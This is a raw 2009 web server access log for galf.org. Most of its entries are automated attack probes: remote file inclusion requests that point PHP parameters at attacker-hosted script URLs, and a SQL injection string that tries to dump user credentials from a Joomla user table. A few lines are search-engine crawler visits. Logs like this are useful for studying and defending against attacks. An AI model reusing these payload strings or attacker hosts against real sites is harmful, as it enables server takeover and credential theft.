72.52.189.20 - - [29/Nov/2009:18:42:34 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:42:34 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [29/Nov/2009:18:42:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.179.121 - - [29/Nov/2009:18:43:46 -0800] "GET /logs/access_090622.log//index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.179.121 - - [29/Nov/2009:18:43:46 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.179.121 - - [29/Nov/2009:18:43:46 -0800] "GET /logs//index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:46:29 -0800] "GET /logs/access_090622.log//////?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:46:29 -0800] "GET /////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:46:29 -0800] "GET /logs//////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:47:01 -0800] "GET /logs//////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:47:01 -0800] "GET /////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
211.193.106.56 - - [29/Nov/2009:18:47:01 -0800] "GET /logs/access_090622.log//////?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:18:47:44 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:18:47:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:18:47:47 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:18:48:55 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:18:48:55 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:18:48:55 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:18:49:02 -0800] "GET /logs/access_090511.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:18:49:39 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:18:49:41 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:18:49:41 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:18:49:41 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [29/Nov/2009:18:50:06 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:18:50:06 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.167.62.169 - - [29/Nov/2009:19:01:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.galf.org"
83.167.62.169 - - [29/Nov/2009:19:01:33 -0800] "GET /?D=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.galf.org"
83.167.62.169 - - [29/Nov/2009:19:01:35 -0800] "GET /?M=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:19:02:03 -0800] "GET /logs//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:19:02:03 -0800] "GET /skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:19:02:03 -0800] "GET /logs/access_090907.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:19:02:03 -0800] "GET /logs/access_090817.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:19:07:20 -0800] "GET /logs/access_090817.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:19:07:20 -0800] "GET /skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:19:07:20 -0800] "GET /logs//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:19:07:21 -0800] "GET /logs/access_090907.log//skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.83.163.73 - - [29/Nov/2009:19:13:31 -0800] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.83.163.73 - - [29/Nov/2009:19:13:31 -0800] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "-" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:18:41 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:18:41 -0800] "GET /?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:18:41 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:18 -0800] "GET /?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:19 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:19 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:25 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:25 -0800] "GET /?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:26 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:35 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:35 -0800] "GET /?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:19:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:20:06 -0800] "GET /logs/access_090504.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:20:18 -0800] "GET /logs/access_090622.log//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:20:18 -0800] "GET /?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [29/Nov/2009:19:20:18 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:19:24:24 -0800] "GET /include/print_category.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:19:24:24 -0800] "GET /logs/access_090511.log/include/print_category.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:19:24:24 -0800] "GET /logs/include/print_category.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:37:25 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:37:25 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:37:25 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:48 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:49 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:50 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [29/Nov/2009:19:39:51 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
218.246.32.199 - - [29/Nov/2009:19:40:11 -0800] "GET /logs/access.log//include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
218.246.32.199 - - [29/Nov/2009:19:40:11 -0800] "GET /include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
218.246.32.199 - - [29/Nov/2009:19:40:11 -0800] "GET /logs//include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:40:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:40:45 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:40:45 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:41:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.217.5.165 - - [29/Nov/2009:19:41:44 -0800] "GET /logs/access_090831.log//view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:19:41:44 -0800] "GET /logs/access.log//view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:19:41:44 -0800] "GET /view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [29/Nov/2009:19:41:44 -0800] "GET /logs//view.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:41:46 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:41:46 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:41:51 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:42:10 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:42:10 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:05 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:06 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:06 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:14 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:14 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:19:43:14 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.246.32.199 - - [29/Nov/2009:19:47:43 -0800] "GET /include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.246.32.199 - - [29/Nov/2009:19:47:43 -0800] "GET /logs/access_090622.log//include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.246.32.199 - - [29/Nov/2009:19:47:43 -0800] "GET /logs//include.php?path[docroot]=http://shiwakamaru.iespana.es/id/v6id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.50.85.59 - - [29/Nov/2009:19:49:38 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:49:38 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:49:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:50:18 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:50:18 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:50:20 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:07 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:07 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:08 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:12 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:12 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:51:12 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:54:58 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:54:58 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:16 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:16 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:18 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:42 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:43 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:43 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:48 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:49 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.50.85.59 - - [29/Nov/2009:19:55:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://doroszewicz-clausen.com/contenido/includes/data/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [29/Nov/2009:20:15:25 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [29/Nov/2009:20:15:25 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [29/Nov/2009:20:15:25 -0800] "GET /logs/access_091019.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [29/Nov/2009:20:15:56 -0800] "GET /logs/access_090907.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
